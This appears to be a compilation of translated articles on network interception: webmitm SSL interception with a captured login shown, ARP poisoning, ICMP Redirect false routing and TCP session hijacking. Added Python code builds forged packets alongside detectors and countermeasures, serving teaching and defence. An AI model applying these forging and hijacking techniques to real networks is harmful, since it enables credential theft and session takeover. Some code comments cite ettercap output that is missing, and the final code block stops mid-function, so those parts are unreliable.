Now we will redirect HTTP traffic. Again we need the previously chosen tool, webmitm, which listens on ports 80 (HTTP) and 443 (HTTPS), intercepts web requests, then connects to the server and relays the requests, and the replies, between the client and the server. The program also generates its own SSL key and certificate with OpenSSL. Then, when the user tries to connect to the site (target.gov), the browser will check the SSL certificate. Since the certificate does not match the site, the user's browser will warn about an incorrect SSL certificate. From the attacker's side it looks something like this:

#webmitm -d
webmitm: relaying transparently
webmitm: new connection from
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[version]
Connection: [type]
Host: www.target.gov
User-Agent: [system, browser information]
[etc, etc, etc]
Cookie: [cookies]

This is how it looks from the outside: the SSL connection is terminated on the attacker's host, which therefore sees the data in the clear. As with sshmitm, webmitm only sees connections that have been redirected to it (with dnsspoof or arpspoof), and the attack stands or falls with the user clicking through the certificate warning.

Conclusion

In this article we looked at redirecting SSH and HTTP traffic with the Man-in-the-Middle attack: clearly, in detail and briefly. Once you have mastered these, you will quickly master other tools for redirecting HTTP and SSH traffic with MitM :)). If something was unclear, then...

Interception of data over a network means obtaining any information from a remote computing device. It may include the user's personal information, his messages and records of website visits. Data can be captured by spyware or with network sniffers.

Spyware is special software capable of recording all the information transmitted over the network from a specific workstation or device.

A sniffer is a program or a hardware/software device that captures and analyses the traffic passing through a network. With the session cookies or credentials captured this way, an attacker can then join a web session and perform operations on behalf of the computer's owner.

If the information is not transmitted in real time, spyware generates reports that make it convenient to view and analyse the information.

Network interception can be carried out legally or illegally. The main document establishing the legality of obtaining information is the Convention on Cybercrime, signed in Budapest, Hungary, in 2001. Legal requirements vary slightly from state to state, but the key message is the same for all countries.

Classification and methods of intercepting data over the network

In line with the above, interception of information over a network can be divided into two types: authorised and unauthorised.

Authorised data capture is carried out for various purposes, from protecting corporate information to ensuring national security. The grounds for such an operation are defined by legislation; it is performed by special services, law enforcement officers, specialists of administrative bodies and company security services.

There are international standards for performing data interception. The European Telecommunications Standards Institute has harmonised a number of the technical processes (ETSI ES 201 158, "Telecommunications security; Lawful Interception (LI); Requirements for network functions") on which interception of information is based. The result is a system architecture that lets intelligence specialists and network administrators obtain data from the network legally. The resulting structure for implementing data interception is used for wired and wireless voice calls, as well as for e-mail correspondence, voice over IP and the exchange of SMS messages.

Unauthorised interception of data over a network is carried out by attackers who want to get hold of confidential data, passwords, corporate secrets, addresses of computers on the network, and so on. To achieve their goals, hackers usually use a network traffic analyser, a sniffer. This program or hardware/software device lets the fraudster capture and analyse the information inside the network to which the victim is connected, including SSL-encrypted traffic if the victim accepts a spoofed certificate. Traffic can be obtained in different ways:

• listening on the network interface,
• inserting an interception device into a break in the channel,
• creating a branch of the traffic and duplicating it to the sniffer,
• by carrying out an attack.

There are also more complex techniques for intercepting important information, which allow intruding into the network exchange and changing data. One of them is forged ARP replies. The essence of the method is to poison the ARP caches of the victim's computer and of its peer so that each maps the other's IP address to the attacker's MAC address, and the traffic between them passes through the attacker. Another method that can be used to intercept data is false routing: it substitutes the attacker's address for the address of the network router. If the criminal knows how the local network the victim sits on is organised, he can easily arrange for the information from the user's machine to be sent to his IP address. Seizing a TCP connection is also an effective way of intercepting data. The attacker breaks into the communication session by generating and sending TCP packets to the victim's computer; the session is then taken over and continued by the criminal instead of the client.

Targets

The targets of data interception over a network can be government agencies, industrial enterprises, commercial structures and ordinary users. Within an organisation or company, information may be captured in order to protect the network infrastructure. Intelligence agencies and law enforcement can carry out mass interception of information transmitted by different owners, depending on the task at hand.

As for cybercriminals, any user or organisation can become a target in order to obtain the data it transmits over the network. With authorised access, the informative content of the captured data is what matters, whereas an attacker is more interested in data that can be turned into money, or valuable information for later resale.

Most often the victims of interception by cybercriminals are users connecting to a public network, for example in a cafe with a Wi-Fi hotspot. The attacker joins the web session using a sniffer, substitutes data and steals personal information.

Source of the threat

Authorised interception of information in companies and organisations is carried out by operators of the public network infrastructure. Their activities are aimed at protecting personal data, trade secrets and other important information. Legally, the transfer of messages and files may be monitored by intelligence services, law enforcement agencies and various government bodies to ensure the safety of citizens and the state.

Criminals engage in illegal data interception. To avoid becoming a cybercriminal's victim, follow a few recommendations from experts. For example, do not perform operations that require authentication or the transfer of sensitive data while connected to public networks. It is safer to choose networks with encryption, and better still to use a personal 3G or LTE modem. When transferring personal data, it is recommended to encrypt it with HTTPS or a personal VPN tunnel.

You can protect your computer from interception of network traffic with cryptography and anti-sniffers; wired rather than wireless network access also reduces the risk.


This lesson describes network hacking techniques based on intercepting network packets. Hackers use them to listen to network traffic in order to steal valuable information, to organise data interception for a man-in-the-middle attack, to seize TCP connections (which allows, say, data spoofing), and to perform other no less interesting actions. Unfortunately, most of these attacks are in practice implemented only for Unix networks, where hackers can use both special utilities and the tools of the Unix system itself. Windows networks, apparently, have been passed over by hackers, and we are forced to limit our description of data interception tools to sniffer programs designed for the trivial listening of network packets. However, one should not neglect at least a theoretical description of such attacks, especially for anti-hackers, since knowledge of the hacking techniques in use helps prevent many troubles.

Network sniffing

Sniffing Ethernet networks is usually done with network cards switched into listening (promiscuous) mode. Listening to an Ethernet network requires connecting a computer running a sniffer to a network segment, after which all the traffic sent and received by the computers in that segment becomes available to the hacker (on a switched network the sniffer sees only broadcast traffic and its own, unless the attacker adds an ARP spoofing attack of the kind described below). It is even easier to intercept traffic on wireless networks: there is no need even to look for a place to connect to the cable. An attacker can also tap the telephone line connecting the computer to the Internet provider, having found a convenient place for it (telephone lines are usually laid in basements and other rarely visited places without any protection).

To demonstrate sniffing we will use the very popular sniffer SpyNet, which can be found on many Web sites. The official site of SpyNet is at http://members.xoom.com/layrentiu2/, where you can download a demo version of the program.

SpyNet consists of two components, CaptureNet and PipeNet. CaptureNet captures the packets transmitted over an Ethernet network at the link level, i.e. in the form of Ethernet frames. PipeNet assembles Ethernet frames into application-layer packets, reconstructing, for example, e-mail messages and HTTP messages (the exchange with a Web server), and performs other functions.

Unfortunately, in the SpyNet demo the capabilities of PipeNet are limited to a demonstration of HTTP packet assembly, so we will not be able to show SpyNet in full. Still, we will demonstrate SpyNet's sniffing capabilities on our experimental network by transferring a text file from the host Sword-2000 to the host Alex-3 with ordinary Windows Explorer. At the same time, on the Alex-3 computer we will run CaptureNet, which will capture the transmitted packets and let us read the contents of the transferred file in the Ethernet frames. Fig. 1 shows the text of the secret message in the file secret.txt; we will try to find this text in the captured Ethernet frames.

Fig. 1. Text of the secret message in the Notepad window

To capture Ethernet frames, do the following:

1. On the Alex-3 computer run CaptureNet. In the program's window select the menu command Capture > Start and begin capturing network frames.

2. With Windows Explorer, copy the file secret.txt from the Sword-2000 computer to Alex-3.

3. After secret.txt has been transferred, select the menu command Capture > Stop and stop the capture.

The captured Ethernet frames appear in the right-hand part of the CaptureNet window (Fig. 2); each row in the upper list is one Ethernet frame, and below the list is the contents of the selected frame.

Fig. 2. An Ethernet frame containing the text of the secret message

Looking through the list of captured frames, we can easily find the one containing the text we transmitted: This is a very big secret.

We stress that this is the simplest case, in which all the captured network traffic was recorded. CaptureNet can capture packets of specific protocols and to specific host ports, select messages with specific contents, and accumulate the captured data in a file. The technique for doing this is simple and can be learned from the SpyNet help system.

Besides primitive network eavesdropping, hackers have more sophisticated means of intercepting data at their disposal. Below is a brief overview of such methods, albeit from the theoretical side. The reason is that for Windows networks the practical implementation of data interception attacks is extremely limited, and the set of reliable utilities for interception attacks is rather poor.

Methods for intercepting network traffic

Network sniffing with network analysers like the CaptureNet above is the first and simplest way of intercepting data. Besides SpyNet, many tools are used for sniffing that were originally developed for analysing network activity, diagnosing networks, selecting traffic by given criteria and other network administration tasks. An example is tcpdump (http://www.tcpdump.org), which can record network traffic in a special log for later analysis.

To protect against network eavesdropping, special programs are used, for example AntiSniff (http://www.securitysoftwaretech.com/antisniff), which can identify the computers on the network that are listening to traffic. Anti-sniffer programs rely on a tell-tale sign of a listening host: the network card of the sniffing computer has to be in a special listening (promiscuous) mode. In that mode a host reacts in a particular way to datagrams sent to it; for example, a listening host typically processes all incoming traffic, not only the frames addressed to its own MAC address, so it will answer an ARP request or an ICMP echo carried in a frame whose destination MAC is not its own. There are other signs of suspicious host behaviour that AntiSniff can recognise, such as the host resolving the names of addresses it has captured.

Without doubt, eavesdropping is very useful from the attacker's point of view, since it yields a lot of useful information: passwords transmitted over the network, addresses of network computers, confidential data, mail, and so on. However, simple eavesdropping does not let a hacker interfere with the communication between two hosts in order to modify or corrupt data. For that a more complex technique is needed.

False ARP requests

To intercept and take over the communication between two hosts A and B, an attacker can poison their ARP caches by sending forged ARP (Address Resolution Protocol) messages to hosts A and B, so that each of them maps the other's IP address to the attacker's MAC address. You can get acquainted with ARP in Appendix D, which describes the procedure for resolving (converting) a host's IP address into the hardware address (MAC address) built into the host's network card. Let's see how a hacker can use ARP to intercept the communication between hosts A and B.

To intercept the traffic between hosts A and B, the hacker makes each host associate his MAC address with the other host's IP address, so that the frames A and B mean for each other are delivered to the hacker's card. To achieve this, the hacker performs the following operations.

1. The attacker finds out the MAC addresses of hosts A and B, for example with an ordinary ARP request or, on Windows, with the nbtstat -a command.

2. The attacker sends to the MAC addresses of hosts A and B messages that are forged ARP replies to requests for resolving the hosts' IP addresses into MAC addresses. Host A is told that host B's IP address corresponds to the MAC address of the attacker's computer; host B is told that host A's IP address likewise corresponds to the attacker's MAC address. Most IP stacks accept such unsolicited replies and update their cache, which is what makes the attack work.

3. Hosts A and B store the received MAC addresses in their ARP caches and then use them when sending messages to each other. Since the IP addresses of A and B now map to the attacker's MAC address, hosts A and B unsuspectingly communicate through an intermediary who can do whatever he likes with their messages. (The attacker has to forward the traffic, otherwise the connection simply breaks, and he has to keep refreshing the victims' ARP entries before they expire.)

To protect against such attacks, network administrators must maintain a table of the correspondence between the MAC and IP addresses of the computers on their network. Then, with special software, for example the arpwatch utility (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz), the network can be polled periodically and inconsistencies identified; static ARP entries on critical hosts and Dynamic ARP Inspection on managed switches close the hole more firmly.

On Unix networks this kind of forged-ARP attack can be carried out with tools such as arpredirect from the dsniff package (renamed arpspoof in later versions). Unfortunately, equally reliable utilities do not seem to exist for Windows 2000/XP networks. For example, from the NTsecurity site (http://www.ntsecurity.nu) you can download the GrabitAll utility, presented as a tool for redirecting traffic between network hosts, but even a basic check of GrabitAll shows that it is still far from fully doing what it claims.
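The forged replies of the three steps above, and the arpwatch-style check that catches them (which is also what the ettercap plugins arp_cop and scan_poisoner do, described earlier on the page), as an added example. This is not code from the book, from arpwatch or from ettercap; it is standard-library Python that builds and parses raw Ethernet/ARP frames in memory. The host names, MAC addresses and the baseline IP-to-MAC table are constructed sample values; the attacker's MAC reuses the address of the ettercap host shown in the search_promisc output above purely as a sample.

```python
"""ARP cache poisoning from both sides: the two forged replies the attacker
sends to hosts A and B, and an arpwatch/scan_poisoner-style check that spots
them.  Added example, standard library only; no frame is put on the wire."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed sample network (not from the page): the attacker's MAC is the one of
# the ettercap host in the output above, reused as a sample; the rest is invented.
ATTACKER_MAC = "08:00:27:af:30:b9"
A_MAC, A_IP = "52:54:00:12:34:01", "192.168.1.34"   # victim host A
B_MAC, B_IP = "52:54:00:12:34:02", "192.168.1.1"    # host B, here the gateway
BASELINE = {A_IP: A_MAC, B_IP: B_MAC}               # administrator's IP -> MAC table


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (RFC 826 layout, 42 bytes)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)       # Ethernet, IPv4, 6-byte MAC, 4-byte IP
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    p = frame[22:42]
    return op, mac_str(p[0:6]), ip_str(p[6:10]), mac_str(p[10:16]), ip_str(p[16:20])


def poison_pair(attacker_mac, a_mac, a_ip, b_mac, b_ip):
    """Step 2 of the text: unsolicited replies telling A that B's IP lives at the
    attacker's MAC, and telling B that A's IP lives there too."""
    return [
        arp_frame(ARP_REPLY, attacker_mac, b_ip, a_mac, a_ip),
        arp_frame(ARP_REPLY, attacker_mac, a_ip, b_mac, b_ip),
    ]


def detect_poisoning(frames, baseline):
    """Two checks over captured ARP replies: (1) the sender's IP->MAC binding
    contradicts the administrator's table (arpwatch's 'changed ethernet address');
    (2) one MAC claims several IPs (scan_poisoner's first test)."""
    alerts, claims = [], {}
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, smac, sip, _, _ = parsed
        expected = baseline.get(sip)
        if expected is not None and expected != smac:
            alerts.append("%s pretends to be %s (expected %s)" % (smac, sip, expected))
        claims.setdefault(smac, set()).add(sip)
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append("%s claims several IPs: %s" % (mac, ", ".join(sorted(ips))))
    return alerts


def demo():
    """Poison the sample pair and run the detector over the captured frames."""
    forged = poison_pair(ATTACKER_MAC, A_MAC, A_IP, B_MAC, B_IP)
    legit = arp_frame(ARP_REPLY, B_MAC, B_IP, A_MAC, A_IP)     # the gateway answering A honestly
    return detect_poisoning([legit] + forged, BASELINE)


if __name__ == "__main__":
    for line in demo():
        print("arp_cop: (WARNING)", line)
```

The first check is only as good as the baseline table, which is why the text insists on the administrator keeping one; the second check needs no table at all but, as the scan_poisoner description notes, fires on every proxy-ARP router. On a real interface the same parser would be fed from a raw socket or a pcap, and the forged frames would be sent through one; neither is done here.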

False routing

To intercept network traffic, an attacker can substitute his own IP address for the real IP address of the network router, for example with forged ICMP Redirect messages. According to RFC 1122, host A treats a received Redirect as a response to a datagram it sent to some other host, say B, and decides what to do from the contents of the message: if the Redirect tells it to send datagrams for B along a new route, that is exactly what host A will do. RFC 1122 does require the host to check that the Redirect comes from the router that is the current first hop for B and that the new gateway lies on the directly connected network, but an attacker on the local segment satisfies both conditions without difficulty.

To carry out false routing, the attacker must know some details of the local network in which host A sits, in particular the IP address of the router through which traffic from A to B is sent. Knowing this, the attacker builds an IP datagram whose source address is the router's IP address and whose destination is host A. The datagram carries an ICMP Redirect message with the "new router" address field set to the IP address of the attacker's computer and, in its body, the header of a datagram A sent to B. Having received such a message, host A will send all its messages for B to the IP address of the attacker's computer.

To protect against this attack, disable the processing of ICMP Redirect messages on host A (on Linux with the sysctl net.ipv4.conf.all.accept_redirects=0, on Windows with the EnableICMPRedirect registry value under Tcpip\Parameters, or by filtering ICMP type 5 with a firewall), and the tracert command (traceroute in Unix) can expose the attacker's computer: it shows the extra hop that has appeared on the local network and was not there when it was set up, if, of course, the administrator is vigilant.
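The forged Redirect of the previous paragraphs and the receiver-side checks of RFC 1122 section 3.2.2.2, as an added example that is not part of the book. It is standard-library Python that builds the attacker's datagram byte for byte (IP header, ICMP type 5 code 1, the quoted header) and then plays host A. All addresses and the routing table are constructed; nothing is sent on a network. The point it demonstrates is the one the text makes: the two RFC checks reject a sloppy forgery but not one from an on-link attacker who knows the router's address, so the working defence is to refuse Redirects altogether.

```python
"""ICMP Redirect as a false-routing attack, and the receiver-side checks of
RFC 1122 section 3.2.2.2.  Added example, standard library only; the datagrams
are built and 'delivered' in memory, nothing is sent."""
import ipaddress
import struct

ICMP_REDIRECT, REDIRECT_HOST = 5, 1

# Constructed sample network (not from the page)
ROUTER, VICTIM, ATTACKER = "192.168.1.1", "192.168.1.34", "192.168.1.35"
LAN = ipaddress.ip_network("192.168.1.0/24")
REMOTE = "203.0.113.10"          # the destination the victim was talking to (host B)


def checksum(data):
    """RFC 1071 ones-complement sum; 0 when run over data that already carries its checksum."""
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]


def forged_redirect(claimed_router, victim, new_gateway, orig_dst):
    """The attacker's datagram: source spoofed as the router, ICMP type 5 code 1
    ('redirect for host'), gateway field = the attacker, body = the IP header plus
    8 bytes of a datagram the victim supposedly sent to orig_dst."""
    quoted = ipv4_header(victim, orig_dst, 6, 8) + b"\0" * 8
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, REDIRECT_HOST, 0,
                       ipaddress.IPv4Address(new_gateway).packed) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return ipv4_header(claimed_router, victim, 1, len(icmp)) + icmp


def process_redirect(datagram, routes, accept_redirects=True):
    """Host A's handling of a received Redirect.  routes maps destination -> next
    hop ('default' for everything else) and is updated in place.  Returns (accepted, why)."""
    if not accept_redirects:
        return False, "redirect processing disabled"
    ihl = (datagram[0] & 0x0F) * 4
    src = str(ipaddress.IPv4Address(datagram[12:16]))
    icmp = datagram[ihl:]
    if datagram[9] != 1 or icmp[0] != ICMP_REDIRECT:
        return False, "not an ICMP redirect"
    if checksum(icmp) != 0:
        return False, "bad ICMP checksum"
    new_gw = str(ipaddress.IPv4Address(icmp[4:8]))
    orig_dst = str(ipaddress.IPv4Address(icmp[8 + 16:8 + 20]))   # dst of the quoted header
    current = routes.get(orig_dst, routes.get("default"))
    # RFC 1122: discard unless it came from the current first hop for that destination...
    if src != current:
        return False, "source %s is not the current first hop %s" % (src, current)
    # ...and the new gateway is on the directly connected network
    if ipaddress.IPv4Address(new_gw) not in LAN:
        return False, "new gateway %s is off-link" % new_gw
    routes[orig_dst] = new_gw
    return True, "traffic for %s now goes via %s" % (orig_dst, new_gw)


def demo():
    """Four deliveries: the well-formed attack, two sloppy forgeries, and a hardened host."""
    results = {}
    routes = {"default": ROUTER}
    results["attack"] = process_redirect(forged_redirect(ROUTER, VICTIM, ATTACKER, REMOTE), routes)
    results["route"] = routes.get(REMOTE)
    results["wrong_source"] = process_redirect(
        forged_redirect("192.168.1.77", VICTIM, ATTACKER, REMOTE), {"default": ROUTER})
    results["off_link"] = process_redirect(
        forged_redirect(ROUTER, VICTIM, "10.9.9.9", REMOTE), {"default": ROUTER})
    results["hardened"] = process_redirect(
        forged_redirect(ROUTER, VICTIM, ATTACKER, REMOTE), {"default": ROUTER}, accept_redirects=False)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The "attack" case is accepted because the attacker spoofed the right source and is on-link, exactly the two facts the text says he must know; only the hardened host, with redirect processing switched off, rejects it.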

The above examples of interception (to which the attackers' capabilities are far from limited) convince us of the need to protect data transmitted over the network if it contains confidential information. The only reliable protection against interception of network traffic is the use of programs that implement cryptographic algorithms and encryption protocols, preventing the disclosure and substitution of secret information. For such tasks, cryptography provides the means to encrypt, sign and authenticate the messages transmitted over secure protocols.

The practical implementation of all the cryptographic methods for protecting information exchange described in Chapter 4 is provided by VPN (Virtual Private Network) networks. A brief overview of the principles and techniques of cryptographic protection can be found in Appendix E, together with a detailed description of the cryptographic protection tools provided by the PGP Desktop Security application (http://www.pgp.com).

TCP connection hijacking

The most sophisticated attack on network traffic is TCP connection hijacking, in which the hacker breaks into the current communication session with a host by generating and sending TCP packets to the attacked host. Then, using TCP's ability to carry on an interrupted connection, the hacker takes over the session and continues it in place of the disconnected client.

Several effective utilities have been written for TCP hijacking, but all of them are implemented for the Unix platform, and on Web sites they are offered only in source form. Thus, for us as convinced practitioners of the noble cause of hacking, attacks by TCP hijacking are of little use. (Those who like digging through other people's code can refer to http://www.cri.cz/~kra/index.html, where the source of the well-known TCP hijacking utility Hunt by Pavel Krauz can be downloaded.)

Despite the lack of practical tools, we cannot pass over such an interesting topic as TCP hijacking, and we will dwell on some aspects of such attacks. Some information about the structure of a TCP packet and the procedure for establishing a TCP connection is given in Appendix D of this book, but here we concentrate on the question: what exactly lets hackers carry out TCP hijacking attacks? Let us consider this in more detail.

TCP (Transmission Control Protocol) is one of the basic transport-layer protocols of the OSI model; it establishes logical connections over a virtual channel. Over this channel packets are sent and received with their order tracked, the flow of packets is controlled, retransmission of corrupted packets is arranged, and at the end of the session the channel is torn down. TCP is the only core protocol of the TCP/IP family with an elaborate system for identifying messages and connections.

To identify a TCP segment, the TCP header has two 32-bit fields that also act as packet counters: the sequence number and the acknowledgment number. We will also need one more header field, the control bits. In RFC 793 this is a 6-bit field with the following bits (from left to right):

URG - urgent flag;

ACK - acknowledgment flag;

PSH - push flag;

RST - reset flag;

SYN - synchronize flag;

FIN - finish (no more data) flag.

Let's look at the procedure for creating a TCP connection.

1. If host A needs to create a TCP connection with host B, host A sends host B the following message:

A -> B: SYN, ISSa

This means that the message sent by host A has the SYN flag (synchronize sequence numbers) set, and the sequence number field holds the initial 32-bit value ISSa (Initial Sequence Number).

2. In response to the request from host A, host B replies with a message in which both the SYN bit and the ACK bit are set. In the sequence number field host B puts its own initial counter value, ISSb; the acknowledgment number field holds the ISSa value received in the first packet from host A, increased by one. So host B answers with this message:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Finally, host A sends host B a message in which the ACK bit is set, the sequence number field holds ISSa + 1 and the acknowledgment number field holds ISSb + 1. After this the TCP connection between hosts A and B is considered established:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Now host A can send data packets to host B over the newly created virtual TCP channel:

A -> B: ACK, ISSa+1, ACK(ISSb+1); DATA

Here DATA stands for the data.

It follows from the connection setup described above that, apart from the IP addresses and port numbers, which any sender can write into a packet, the only identifiers of the TCP parties and of the connection are the two 32-bit counters derived from ISSa and ISSb. Therefore, if a hacker manages to learn the current values of these counters, nothing stops him from forging a TCP packet. In other words, the hacker only needs to pick the current sequence and acknowledgment numbers of a given TCP connection, send a packet from any Internet host on behalf of the client of that connection, and the packet will be accepted as genuine!
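The handshake of steps 1 to 4, with the counters named as in the text, and the segment an attacker forges once he has sniffed them, as an added example. This is not code from the book or from Hunt; it is standard-library Python that packs and parses real TCP headers but keeps the two endpoints as in-memory objects, so no sockets are involved and there is no IP layer or checksum. The port numbers and the fixed ISS values (1000 and 5000) are constructed so the arithmetic can be followed by hand; the injected command is likewise invented.

```python
"""The three-way handshake with the counters ISSa and ISSb from the text, and
the segment an attacker who has sniffed those counters forges to take over the
connection.  Added example, standard library only; the endpoints are in-memory
objects, no sockets are used."""
import struct

MASK = 0xFFFFFFFF
# Control bits as laid out in RFC 793, left to right: URG ACK PSH RST SYN FIN
URG, ACK, PSH, RST, SYN, FIN = 0x20, 0x10, 0x08, 0x04, 0x02, 0x01


def tcp_segment(sport, dport, seq, ack, flags, data=b""):
    """20-byte TCP header without options (data offset 5); the checksum is left
    zero because there is no IP pseudo-header in this model."""
    return struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0) + data


def parse_tcp(segment):
    sport, dport, seq, ack, offset, flags, _, _, _ = struct.unpack("!HHIIBBHHH", segment[:20])
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "data": segment[(offset >> 4) * 4:]}


class Endpoint:
    """Minimal connection state: next sequence number to send, next one expected."""
    def __init__(self, port, iss):
        self.port, self.iss = port, iss
        self.snd_nxt = self.rcv_nxt = None
        self.received = []


def handshake(a, b):
    """Steps 1-3 of the text; returns the three segments as seen on the wire."""
    s1 = tcp_segment(a.port, b.port, a.iss, 0, SYN)                                 # A -> B: SYN, ISSa
    s2 = tcp_segment(b.port, a.port, b.iss, (a.iss + 1) & MASK, SYN | ACK)          # B -> A: SYN, ACK, ISSb, ACK(ISSa+1)
    s3 = tcp_segment(a.port, b.port, (a.iss + 1) & MASK, (b.iss + 1) & MASK, ACK)   # A -> B: ACK, ISSa+1, ACK(ISSb+1)
    a.snd_nxt, a.rcv_nxt = (a.iss + 1) & MASK, (b.iss + 1) & MASK                   # a SYN consumes one number each way
    b.snd_nxt, b.rcv_nxt = (b.iss + 1) & MASK, (a.iss + 1) & MASK
    return [s1, s2, s3]


def deliver(receiver, segment):
    """Receiver-side acceptance of a data segment (step 4): nothing but the port
    and the sequence number is checked, which is exactly what the hijacker relies on."""
    h = parse_tcp(segment)
    if h["dport"] != receiver.port or not h["flags"] & ACK:
        return "ignored"
    if h["seq"] != receiver.rcv_nxt:
        return "dropped: seq %d, expected %d" % (h["seq"], receiver.rcv_nxt)
    receiver.received.append(h["data"])
    receiver.rcv_nxt = (receiver.rcv_nxt + len(h["data"])) & MASK
    return "accepted"


def hijack(sniffed_handshake, payload):
    """What an attacker on A's segment does: take the counters from A's final
    ACK (seq = ISSa+1, ack = ISSb+1) and forge A's step-4 segment with his own
    payload.  To B it is indistinguishable from A's next segment."""
    last = parse_tcp(sniffed_handshake[-1])
    return tcp_segment(last["sport"], last["dport"], last["seq"], last["ack"], ACK | PSH, payload)


def demo():
    """Constructed session (not from the page): A on port 1025 talks to a telnet
    server B (port 23); the ISS values are fixed so the numbers can be followed."""
    a, b = Endpoint(1025, 1000), Endpoint(23, 5000)
    wire = handshake(a, b)
    forged = hijack(wire, b"cat /etc/passwd\r\n")
    attacker_result = deliver(b, forged)
    # A now sends its genuine first command with the counters it believes are current
    client_result = deliver(b, tcp_segment(a.port, b.port, a.snd_nxt, a.rcv_nxt, ACK | PSH, b"ls\r\n"))
    return attacker_result, client_result, b.received


if __name__ == "__main__":
    print(demo())
```

Two things to read off the result. The forged segment is accepted with no check beyond seq == rcv_nxt, and because it advanced B's counter by the length of the injected data, A's own next segment (still at ISSa+1) is now out of sequence and dropped: that is the "mismatch of counters" by which the legitimate client loses the session. A real stack would also answer the stale segment with an ACK, producing the ACK storm that Hunt has to suppress.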

    Such TCP packet spoofing is all the more dangerous because the higher-level FTP and TELNET protocols are implemented on top of TCP, and the identification of FTP and TELNET clients rests entirely on TCP.

    In addition, since the FTP and TELNET protocols do not check the IP addresses of message senders, after receiving a falsified packet the FTP or TELNET server will send its response to the hacker host's IP address specified in the false packet. From then on the hacker host works with the FTP or TELNET server from its own IP address but with the rights of the legitimately connected user, who in turn loses contact with the server because his counters no longer match.

    Thus, the necessary and sufficient condition for carrying out the attack described above is knowledge of the two current 32-bit parameters ISSa and ISSb that identify the TCP connection. Let's consider possible ways of obtaining them. When the hacker host is connected to the attacked network segment, obtaining the values of ISSa and ISSb is trivial and is solved by analyzing the network traffic. Therefore, it must be clearly understood that the TCP protocol can, in principle, protect a connection only if it is impossible for an attacker to intercept the messages transmitted over it, that is, only when the hacker host is connected to a network segment different from those of the TCP connection's subscribers.

    Therefore, intersegment attacks, in which the attacker and his target are in different network segments, are of greatest interest to a hacker. In this case, obtaining the values of ISSa and ISSb is not trivial. Only two methods of solving this problem have been devised so far:

    1. Mathematical prediction of the initial values of the TCP connection parameters by extrapolating previous values of ISSa and ISSb.

    2. Exploiting vulnerabilities in the identification of TCP connection subscribers on Unix rsh servers.

    The first approach requires in-depth study of the TCP implementation in various operating systems and currently has purely theoretical significance. The second exploits weaknesses in how Unix systems identify trusted hosts. (Trusted with respect to a given host A is a network host B whose user can connect to host A without authentication using the r-services of host A.) By manipulating the parameters of TCP packets, a hacker can try to impersonate a trusted host and intercept a TCP connection with the attacked host.
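    To illustrate the first method and the defence against it, an added example that is not from the article or the book it draws on: a fixed-step ISN generator of the kind that extrapolation defeats, next to a generator built on the RFC 6528 formula (a secret-keyed per-connection offset added to the clock), plus a simple audit check a defender can run over ISNs observed from their own hosts. The class names, the sample addresses and the test key are constructed.

```python
import hashlib
import hmac
import secrets

# Added example, not the article's code. Two initial-sequence-number generators
# side by side with a simple audit check: the first is the classic predictable
# scheme (one global counter stepped by a constant), the second follows RFC 6528,
# ISN = M + F(localip, localport, remoteip, remoteport, secretkey), where M is a
# 4-microsecond clock and F a keyed hash (HMAC-SHA256 here; the RFC suggests MD5).
MASK = 0xFFFFFFFF

class CounterIsn:
    """Predictable: every new connection gets the previous ISN plus a fixed step."""
    def __init__(self, start=0, step=64000):
        self.value, self.step = start, step
    def next_isn(self, local, remote, clock):  # local/remote are (ip, port) pairs
        self.value = (self.value + self.step) & MASK
        return self.value

class KeyedIsn:
    """RFC 6528 style: the per-connection offset F depends on a secret key, so ISNs
    observed on other connections reveal nothing about the one being protected."""
    def __init__(self, key=None):
        self.key = secrets.token_bytes(16) if key is None else key
    def next_isn(self, local, remote, clock):
        four_tuple = f"{local[0]}:{local[1]}|{remote[0]}:{remote[1]}".encode()
        f = int.from_bytes(hmac.new(self.key, four_tuple, hashlib.sha256).digest()[:4], "big")
        return (clock + f) & MASK

def constant_stride(isns):
    """Audit check: True when consecutive ISNs differ by one fixed amount mod 2^32,
    i.e. the next value follows by simple extrapolation (the article's first method)."""
    strides = {(b - a) & MASK for a, b in zip(isns, isns[1:])}
    return len(strides) == 1

def sample_isns(gen, n, clock_step=250):
    """Constructed scenario: n connections opened in a row from the same client,
    each from a new ephemeral port, observed at evenly spaced clock ticks."""
    server = ("10.0.0.1", 23)
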